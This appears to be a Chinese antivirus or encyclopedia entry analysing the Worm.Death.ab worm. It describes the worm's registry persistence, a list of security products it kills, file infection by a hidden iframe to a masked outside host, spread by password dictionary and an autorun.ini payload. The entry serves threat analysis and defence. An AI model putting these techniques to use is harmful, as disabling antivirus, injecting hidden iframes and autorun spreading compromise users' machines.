基本介紹
- 外文名:Worm.Death.ab
- 處理時間:2007-03-15
- 威脅級別:★★
- 病毒類型:蠕蟲
中文名稱:死亡之吻 影響系統:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行為:
1.在病毒所在目錄下釋放感染前原檔案%病毒名%1L1~.exe
並往系統目錄裡面釋放一個病毒體
%system%\\Supervise.exe (Worm.Death.ab.103936)
2.修改註冊表
使"顯示隱藏檔案"不可選
HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL
"CheckedValue" = "0x00"
添加自啟動項
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"Supervise.exe" = "%system%\\Supervise.exe"
3.中止進程
病毒中止以下進程名的進程
EGHOST.EXE
MAILMON.exe
kavpfw.exe
iparmor.exe
_AVP32.EXE
_AVPCC.exe
_avpm.exe
avp.exe
navapw32.exe
navw32.exe
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VstskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
RKVXP.kxp
KvmonXP.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundll32.exe
runiep.exe
4.枚舉視窗
病毒枚舉桌面上的視窗,向視窗名為以下字元的視窗傳送退出的訊息
Symantec AntiVirus 企業版
江民防毒軟體 KV2006:實時監視
LockDownMain
ZoneAlarm
天網防火牆個人版
天網防火牆企業版
VirusScan
Symantec Antivirus
DubaWrapped gift Killer
IceSword
pjf(ustc)
噬菌體
5.感染檔案
病毒會感染以下擴展名檔案:
EXE
SCR
COM
PIF
HTM
HTML
ASP
PHP
JSP
ASPX
代碼如下:
< iframe src=http://*****.comcn/baidu.htm width=0 height=0>
6.區域網路傳播
病毒生成密碼字典C:\pass.dic
並使用該字典上面的密碼嘗試登錄區域網路內機器
若登錄成功,則感染該機
7.感染移動硬碟
病毒會在移動存儲器的分區裡面生成autorun.ini
寫入以下內容
[Autorun]
OPEN=Death.exe
shellexecute=Death.exe
shell\Auto\command=Death.exe